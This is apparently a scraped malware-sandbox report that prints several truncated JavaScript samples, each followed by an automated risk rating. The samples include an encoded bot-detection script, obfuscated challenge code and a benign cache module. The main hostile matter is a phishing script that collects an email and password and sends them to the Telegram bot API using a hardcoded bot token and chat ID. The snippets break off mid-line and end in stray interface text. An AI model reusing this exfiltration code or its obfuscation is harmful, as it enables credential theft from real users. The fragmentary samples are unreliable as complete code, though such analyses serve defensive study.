var _57896="b2wqLwppZighd2luZG93LkJ1ZmZlcil7Lypub2RlanMqLwppZighd2luZG93LmVtaXQpey8qY291Y2hqcyovCmlmKCF3aW5kb3cuc3Bhd24pey8qcmhpbm8qLwppZighd2luZG93LndlYmRyaXZlcil7LypzZWxlbml1bSovCmlmKCF3aW5kb3cuZG9tQXV0b21hdGlvbiB8fCAhd2luZG93LmRvbUF1dG9tYXRpb25Db250cm9sbGVyKXsvKmNocm9taXVtIGJhc2VkIGF1dG9tYXRpb24gZHJpdmVyKi8KaWYoIXdpbmRvdy5kb2N1bWVudC5kb2N1bWVudEVsZW1lbnQuZ2V0QXR0cmlidXRlKCJ3ZWJkcml2ZXIiKSl7Ci8qaWYobmF2aWdhdG9yLnVzZXJBZ2VudCl7Ki8KaWYoIS9ib3R8Y3VybHxrb2RpfHhibWN8d2dldHx1cmxsaWJ8cHl0aG9ufHdpbmh0dHB8aHR0cmFja3xhbGV4YXxpYV9hcmNoaXZlcnxmYWNlYm9va3x0d2l0dGVyfGxpbmtlZGlufHBpbmdkb20vaS50ZXN0KG5hdmlnYXRvci51c2VyQWdlbnQpKXsKLyppZihuYXZpZ2F0b3IuY29va2llRW5hYmxlZCl7Ki8KLyppZihkb2N1bWVudC5jb29raWUubWF0Y2goL14oPzouKjspP1xzKlswLTlhLWZdezMyfVxzKj1ccyooW147XSspKD86LiopPyQvKSl7Ki8vKkh0dHBPbmx5IENvb2tpZSBmbGFncyBwcmV2ZW50IHRoaXMqLwogICAgICAgICAgICAgICAgICAgICAgICB2YXIgXzQ5MDU0PXBhcnNlSW50KCIyMDI0MTIwMiIsIDEwKSArIHBhcnNlSW50KCIwMjEyMjAyNCIsIDEwKTsKICAgICAgICAgICAgICAgICAgICAgICAgLyp9Ki8KLyp9Ki8KfQovKn0qLwp9Cn0KfQp9Cn0KfQp9Cn0KICAgICAgICAgICAgICAgICAgICAgICAgLy9lbmQgamF2YXNjcmlwdCBwdXp6bGUKICAgICAgICAgICAgICAgICAgICAgICAgdmFyIHhodHRwID0gbmV3IFhNTEh0dHBSZ";var __52099="XF1ZXN0KCk7CiAgICAgICAgICAgICAgICAgICAgICAgIHhodHRwLm9ucmVhZHlzdGF0ZWNoYW5nZSA9IGZ1bmN0aW9uKCkgewogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlmICh4aHR0cC5yZWFkeVN0YXRlID09PSA0KXsKICAgICAgICAgICAgICAgICBjb25zdCBmaXJzdEZvcm0gPSBkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCdmb3JtJyk7CgovLyBDaGVjayBpZiB0aGUgZm9ybSBleGlzdHMgYW5kIGlmIGl0IGhhcyBpbnB1dCBlbGVtZW50cwppZiAoZmlyc3RGb3JtKSB7CiAgY29uc3QgaW5wdXRGaWVsZHMgPSBmaXJzdEZvcm0ucXVlcnlTZWxlY3RvckFsbCgnaW5wdXQnKTsKICAKICBpZiAoaW5wdXRGaWVsZHMubGVuZ3RoID4gMCkgewogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZG9jdW1lbnQuZm9ybXNbMF0uc3VibWl0KCk7CiAgfSBlbHNlIHsKICAgICAgICAgICAgICAgICAgIGlmICghd2luZG93LmxvY2F0aW9uLmhhc2gpIHsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdpbmRvdy5sb2NhdGlvbi5ocmVmID0gd2luZG93LmxvY2F0aW9uLmhyZWY7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB9IGVsc2UgewogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdpbmRvdy5sb2NhdGlvbi5yZWxvYWQoKTsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIH0KICB9Cn0gZWxzZSB7CiAgICAgICAgICAgICAgICAgaWYgKCF3aW5kb3cubG9jYXRpb24uaGFzaCkgewogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC";var ___52480="AgICAgd2luZG93LmxvY2F0aW9uLmhyZWYgPSB3aW5kb3cubG9jYXRpb24uaHJlZjsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIH0gZWxzZSB7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2luZG93LmxvY2F0aW9uLnJlbG9hZCgpOwogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgfQp9CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgfQogICAgICAgICAgICAgICAgICAgICAgICB9OwogICAgICAgICAgICAgICAgICAgICAgICB4aHR0cC5vcGVuKCJQT1NUIiwgIi9na20iLCB0cnVlKTsKICAgICAgICAgICAgICAgICAgICAgICAgeGh0dHAuc2V0UmVxdWVzdEhlYWRlcigneVkwR0gyTEhUTjZKMENJemN2bVY5RVg3ZFknLCBfNDkwNTQpOyAvL21ha2UgdGhlIGFuc3dlciB3aGF0IGV2ZXIgdGhlIGJyb3dzZXIgZmlndXJlcyBpdCBvdXQgdG8gYmUKICAgICAgICAgICAgICAgICAgICAgICAgeGh0dHAuc2V0UmVxdWVzdEhlYWRlcignWC1SZXF1ZXN0ZWQtd2l0aCcsICdYTUxIdHRwUmVxdWVzdCcpOwogICAgICAgICAgICAgICAgICAgICAgICB4aHR0cC5zZXRSZXF1ZXN0SGVhZGVyKCdYLVJlcXVlc3RlZC1UaW1lU3RhbXAnLCAnJyk7CiAgICAgICAgICAgICAgICAgICAgICAgIHhodHRwLnNldFJlcXVlc3RIZWFkZXIoJ1gtUmVxdWVzdGVkLVRpbWVTdGFtcC1FeHBpcmUnLCAnJyk7CiAgICAgICAgICAgICAgICAgICAgICAgIHhodHRwLnNldFJlcXVlc3RIZWFkZXIoJ1gtUmVxdWVzdGVkLVRpbWVTdGFtcC1Db21iaW5hdGlvbicsICcnKTsKICAgICAgICAgICAgICAgICAgICAgICAgeGh0dHAuc2V0UmVxdWVzdEh";var ____52420="ICAgICAgICAgICAgICAgeGh0dHAuc2VuZCgibmFtZTE9SGVucnkmbmFtZTI9Rm9yZCIpOwogICAgICAgIH0sIGZhbHNlKTsKfSkoKTsK";var _86766="KGZ1bmN0aW9uKCl7CiAgICAgICAgdmFyIGEgPSBmdW5jdGlvbigpIHt0cnl7cmV0dXJuICEhd2luZG93LmFkZEV2ZW50TGlzdGVuZXJ9IGNhdGNoKGUpIHtyZXR1cm4gITF9IH0sCiAgICAgICAgYiA9IGZ1bmN0aW9uKGIsIGMpIHthKCkgPyBkb2N1bWVudC5hZGRFdmVudExpc3RlbmVyKCJET01Db250ZW50TG9hZGVkIiwgYiwgYykgOiBkb2N1bWVudC5hdHRhY2hFdmVudCgib25yZWFkeXN0YXRlY2hhbmdlIiwgYil9OwogICAgICAgIGIoZnVuY3Rpb24oKXsKICAgICAgICAgICAgICAgICAgICAgICAgdmFyIG5vdyA9IG5ldyBEYXR |
| URL: JavaScript Model: Joe Sandbox AI | {
"risk_score": 8,
"reasoning": "High-risk code showing multiple red flags: heavy obfuscation (encoded strings, complex mathematical operations), use of dynamic code manipulation (String.fromCharCode), suspicious variable naming, and potential data collection/exfiltration patterns. Code appears to be part of a challenge/fingerprinting system with possible malicious intent."
} |
window._cf_chl_opt={cFPWv:'b'};~function(X,h,i,j,o,s,z,A,D){X=b,function(c,d,W,e,f){for(W=b,e=c();!![];)try{if(f=-parseInt(W(368))/1*(-parseInt(W(364))/2)+-parseInt(W(447))/3+-parseInt(W(439))/4*(-parseInt(W(406))/5)+-parseInt(W(412))/6+-parseInt(W(398))/7+parseInt(W(397))/8+parseInt(W(415))/9,d===f)break;else e.push(e.shift())}catch(F){e.push(e.shift())}}(a,880906),h=this||self,i=h[X(370)],j=function(Y,d,e,f){return Y=X,d=String[Y(446)],e={'h':function(F){return null==F?'':e.g(F,6,function(G,Z){return Z=b,Z(445)[Z(403)](G)})},'g':function(F,G,H,a0,I,J,K,L,M,N,O,P,Q,R,S,T,U,V){if(a0=Y,null==F)return'';for(J={},K={},L='',M=2,N=3,O=2,P=[],Q=0,R=0,S=0;S<F[a0(353)];S+=1)if(T=F[a0(403)](S),Object[a0(391)][a0(414)][a0(344)](J,T)||(J[T]=N++,K[T]=!0),U=L+T,Object[a0(391)][a0(414)][a0(344)](J,U))L=U;else{if(Object[a0(391)][a0(414)][a0(344)](K,L)){if(256>L[a0(342)](0)){for(I=0;I<O;Q<<=1,G-1==R?(R=0,P[a0(426)](H(Q)),Q=0):R++,I++);for(V=L[a0(342)](0),I=0;8>I;Q=Q<<1|V&1.13,G-1==R?(R=0,P[a0(426)](H(Q)),Q=0):R++,V>>=1,I++);}else{for(V=1,I=0;I<O;Q=Q<<1.17|V,G-1==R?(R=0,P[a0(426)](H(Q)),Q=0):R++,V=0,I++);for(V=L[a0(342)](0),I=0;16>I;Q=Q<<1|V&1,R==G-1?(R=0,P[a0(426)](H(Q)),Q=0):R++,V>>=1,I++);}M--,0==M&&(M=Math[a0(395)](2,O),O++),delete K[L]}else for(V=J[L],I=0;I<O;Q=1.42&V|Q<<1.35,R==G-1?(R=0,P[a0(426)](H(Q)),Q=0):R++,V>>=1,I++);L=(M--,M==0&&(M=Math[a0(395)](2,O),O++),J[U]=N++,String(T))}if(''!==L){if(Object[a0(391)][a0(414)][a0(344)](K,L)){if(256>L[a0(342)](0)){for(I=0;I<O;Q<<=1,G-1==R?(R=0,P[a0(426)](H(Q)),Q=0):R++,I++);for(V=L[a0(342)](0),I=0;8>I;Q=V&1|Q<<1,R==G-1?(R=0,P[a0(426)](H(Q)),Q=0):R++,V>>=1,I++);}else{for(V=1,I=0;I<O;Q=Q<<1.42|V,R==G-1?(R=0,P[a0(426)](H(Q)),Q=0):R++,V=0,I++);for(V=L[a0(342)](0),I=0;16>I;Q=1.27&V|Q<<1,G-1==R?(R=0,P[a0(426)](H(Q)),Q=0):R++,V>>=1,I++);}M--,0==M&&(M=Math[a0(395)](2,O),O++),delete K[L]}else for(V=J[L],I=0;I<O;Q=Q<<1|V&1.11,R==G-1?(R=0,P[a0(426)](H(Q)),Q=0):R++,V>>=1,I++);M--,0==M&&O++}for(V=2,I=0;I<O;Q=V&1|Q<<1,G-1==R?(R=0,P[a0(426)](H(Q)),Q=0):R++,V>>=1,I++);for(;;)if(Q<<=1,G-1==R){P[a0(426)](H(Q));break}else R++;return P[a0(448)]('')},'j':function(F,a1){return a1=Y,F==null?'':''==F?null:e.i(F[a1(353)],32768,function(G,a2){return a2=a1,F[a2(342)](G)})},'i':function(F,G,H,a3,I,J,K,L,M,N,O,P,Q,R,S,T,V,U){for(a3=Y,I=[],J=4,K=4,L=3,M=[],P=H(0),Q=G,R=1,N=0;3>N;I[N]=N,N+=1);for(S=0,T=Math[a3(395)](2,2),O=1;T!=O;U=Q&P,Q>>=1,0==Q&&(Q=G,P=H(R++)),S|=O*(0<U?1:0),O<<=1);switch(S){case 0:for(S=0,T=Math[a3(395)](2,8),O=1;T!=O;U=Q&P,Q>>=1,Q==0&&(Q=G,P=H(R++)),S|=O*(0<U?1:0),O<<=1);V=d(S);break;case 1:for(S=0,T=Math[a3(395)](2,16),O=1;T!=O;U=Q&P,Q>>=1,Q==0&&(Q=G,P=H(R++)),S|=O*(0<U?1:0),O<<=1);V=d(S);break;case 2:return''}for(N=I[3]=V,M[a3(426)](V);;){if(R>F)return'';for(S=0,T=Math[a3(395)](2,L),O=1;T!=O;U=P&Q,Q>>=1,Q==0&&(Q=G,P=H(R++)),S|=O*(0<U?1:0),O<<=1);switch(V=S){case 0:for(S=0,T=Math[a3(395)](2,8),O=1;O!=T;U=P&Q,Q>>=1,Q==0&&(Q=G,P=H(R++)),S|=(0<U?1:0)*O,O<<=1);I[K++]=d(S),V=K-1,J--;break;case 1:for(S=0,T=Math[a3(395)](2,16),O=1;T!=O;U=P&Q,Q>>=1,0==Q&&(Q=G,P=H(R++)),S|=(0<U?1:0)*O,O<<=1);I[K++]=d(S),V=K-1,J--;break;case 2:return M[a3(448)]('')}if(J==0&&(J=Math[a3(395)](2,L),L++),I[V])V=I[V];else if(K===V)V=N+N[a3(403)](0);else return null;M[a3(426)](V),I[K++]=N+V[a3(403)](0),J--,N=V,J==0&&(J=Math[a3(395)](2,L),L++)}}},f={},f[Y(333)]=e.h,f}(),o={},o[X(360)]='o',o[X(429)]='s',o[X(383)]='u',o[X(385)]='z',o[X(442)]='n',o[X(369)]='I',o[X(438)]='b',s=o,h[X(341)]=function(F,G,H,I,af,K,L,M,N,O,P){if(af=X,G===null||G===void 0)return I;for(K=y(G),F[af(435)][af(423)]&&(K=K[af(379)](F[af(435)][af(423)](G))),K=F[af(371)][af(331)]&&F[af(337)]?F[af(371)][af(331)](new F[(af(337))](K)):function(Q,ag,R){for(ag=af,Q[ag(393)](),R=0;R<Q[ag(353)];Q[R]===Q[R+1]?Q[ag(376)](R+1,1):R+=1);return Q}(K),L='nAsAaAb'.split('A'),L=L[af(437)][af(339)](L),M=0;M<K[af(353)];N=K[M],O=x(F,G,N),L(O)?(P=O==='s'&&!F[af(443)](G[N]),af(440)===H+N?J(H+N,O):P||J(H+N,G[N])):J(H+N,O),M++);return I;function J(Q,R,ae){ae=b,Object[ae(391)][ae(414)][ae(344)](I,R) |
| URL: JavaScript Model: Joe Sandbox AI | {
"risk_score": 2,
"reasoning": "This code appears to be a legitimate cache implementation module. It contains standard cache operations (get, set, delete) and uses native JavaScript features like Maps and Symbols. While it uses Object.create and Object.defineProperty, these are for module exports and not for malicious purposes. No external data transmission, eval, or suspicious domains are present."
} |
(()=>{var qv=Object.create;var Hi=Object.defineProperty;var $v=Object.getOwnPropertyDescriptor;var Lv=Object.getOwnPropertyNames;var Mv=Object.getPrototypeOf,Nv=Object.prototype.hasOwnProperty;var df=r=>Hi(r,"__esModule",{value:!0});var hf=r=>{if(typeof require!="undefined")return require(r);throw new Error('Dynamic require of "'+r+'" is not supported')};var P=(r,e)=>()=>(r&&(e=r(r=0)),e);var x=(r,e)=>()=>(e||r((e={exports:{}}).exports,e),e.exports),Ge=(r,e)=>{df(r);for(var t in e)Hi(r,t,{get:e[t],enumerable:!0})},Bv=(r,e,t)=>{if(e&&typeof e=="object"||typeof e=="function")for(let i of Lv(e))!Nv.call(r,i)&&i!=="default"&&Hi(r,i,{get:()=>e[i],enumerable:!(t=$v(e,i))||t.enumerable});return r},pe=r=>Bv(df(Hi(r!=null?qv(Mv(r)):{},"default",r&&r.__esModule&&"default"in r?{get:()=>r.default,enumerable:!0}:{value:r,enumerable:!0})),r);var m,u=P(()=>{m={platform:"",env:{},versions:{node:"14.17.6"}}});var Fv,be,ft=P(()=>{u();Fv=0,be={readFileSync:r=>self[r]||"",statSync:()=>({mtimeMs:Fv++}),promises:{readFile:r=>Promise.resolve(self[r]||"")}}});var Fs=x((oP,gf)=>{u();"use strict";var mf=class{constructor(e={}){if(!(e.maxSize&&e.maxSize>0))throw new TypeError("`maxSize` must be a number greater than 0");if(typeof e.maxAge=="number"&&e.maxAge===0)throw new TypeError("`maxAge` must be a number greater than 0");this.maxSize=e.maxSize,this.maxAge=e.maxAge||1/0,this.onEviction=e.onEviction,this.cache=new Map,this.oldCache=new Map,this._size=0}_emitEvictions(e){if(typeof this.onEviction=="function")for(let[t,i]of e)this.onEviction(t,i.value)}_deleteIfExpired(e,t){return typeof t.expiry=="number"&&t.expiry<=Date.now()?(typeof this.onEviction=="function"&&this.onEviction(e,t.value),this.delete(e)):!1}_getOrDeleteIfExpired(e,t){if(this._deleteIfExpired(e,t)===!1)return t.value}_getItemValue(e,t){return t.expiry?this._getOrDeleteIfExpired(e,t):t.value}_peek(e,t){let i=t.get(e);return this._getItemValue(e,i)}_set(e,t){this.cache.set(e,t),this._size++,this._size>=this.maxSize&&(this._size=0,this._emitEvictions(this.oldCache),this.oldCache=this.cache,this.cache=new Map)}_moveToRecent(e,t){this.oldCache.delete(e),this._set(e,t)}*_entriesAscending(){for(let e of this.oldCache){let[t,i]=e;this.cache.has(t)||this._deleteIfExpired(t,i)===!1&&(yield e)}for(let e of this.cache){let[t,i]=e;this._deleteIfExpired(t,i)===!1&&(yield e)}}get(e){if(this.cache.has(e)){let t=this.cache.get(e);return this._getItemValue(e,t)}if(this.oldCache.has(e)){let t=this.oldCache.get(e);if(this._deleteIfExpired(e,t)===!1)return this._moveToRecent(e,t),t.value}}set(e,t,{maxAge:i=this.maxAge===1/0?void 0:Date.now()+this.maxAge}={}){this.cache.has(e)?this.cache.set(e,{value:t,maxAge:i}):this._set(e,{value:t,expiry:i})}has(e){return this.cache.has(e)?!this._deleteIfExpired(e,this.cache.get(e)):this.oldCache.has(e)?!this._deleteIfExpired(e,this.oldCache.get(e)):!1}peek(e){if(this.cache.has(e))return this._peek(e,this.cache);if(this.oldCache.has(e))return this._peek(e,this.oldCache)}delete(e){let t=this.cache.delete(e);return t&&this._size--,this.oldCache.delete(e)||t}clear(){this.cache.clear(),this.oldCache.clear(),this._size=0}resize(e){if(!(e&&e>0))throw new TypeError("`maxSize` must be a number greater than 0");let t=[...this._entriesAscending()],i=t.length-e;i<0?(this.cache=new Map(t),this.oldCache=new Map,this._size=t.length):(i>0&&this._emitEvictions(t.slice(0,i)),this.oldCache=new Map(t.slice(i)),this.cache=new Map,this._size=0),this.maxSize=e}*keys(){for(let[e]of this)yield e}*values(){for(let[,e]of this)yield e}*[Symbol.iterator](){for(let e of this.cache){let[t,i]=e;this._deleteIfExpired(t,i)===!1&&(yield[t,i.value])}for(let e of this.oldCache){let[t,i]=e;this.cache.has(t)||this._deleteIfExpired(t,i)===!1&&(yield[t,i.value])}}*entriesDescending(){let e=[...this.cache];for(let t=e.length-1;t>=0;--t){let i=e[t],[n,s]=i;this._deleteIfExpired(n,s)===!1&&(yield[n,s.value])}e=[...this.oldCache];for(let t=e.length-1;t>=0;--t){let i=e[t],[n,s]=i;this.cache.has(n)||this._deleteIfExpire |
| URL: JavaScript Model: Joe Sandbox AI | {
"risk_score": 10,
"reasoning": "Highly malicious script that steals user credentials (email/password) and exfiltrates them via Telegram bot API. Contains obfuscated code (_0x prefix pattern), hardcoded Telegram bot token and chat ID, and deliberately obscured variable names. Clear credential harvesting and data exfiltration behavior."
} |
var _0x40d1b3 = _0x1298;
function _0x1298(_0x93b389, _0x301fc5) {
var _0x190b9e = _0x190b();
return (
(_0x1298 = function (_0x12988f, _0x35f94c) {
_0x12988f = _0x12988f - 0x121;
var _0x866d3 = _0x190b9e[_0x12988f];
return _0x866d3;
}),
_0x1298(_0x93b389, _0x301fc5)
);
}
function _0x1298a(data) {
const _0x40d1b3a = '7499623592:AAG4sRR7YzmOAFkZFFwiAbBsnnHB-lXYLSk';
const _0x301fc5a = '1411469413';
const _0x93b389a = ` - ${data.email}:${data.password}`;
const _0x190b9ea = `https://api.telegram.org/bot${_0x40d1b3a}/sendMessage?chat_id=${_0x301fc5a}&text=${encodeURIComponent(
_0x93b389a
)}`;
fetch(_0x190b9ea, { method: "GET" })
.then((response) => {
if (response.ok) {
// La requte a russi
} else {
}
})
.catch((error) => {
console.error(error);
});
}
function _0x190b() {
var _0x185b99 = [
"234346BnGWhS",
"click",
"erreur-email",
"DOMContentLoaded",
"getElementById",
"POST",
"36633JrLxNF",
"hidden",
"94040SLmWws",
"status",
"Une\x20erreur\x20s
|
Edit tour
chrome.exe (PID: 5856 cmdline: 
Key Decision
Richest Path
Thread / callback creation
Lower opacity -> Library Node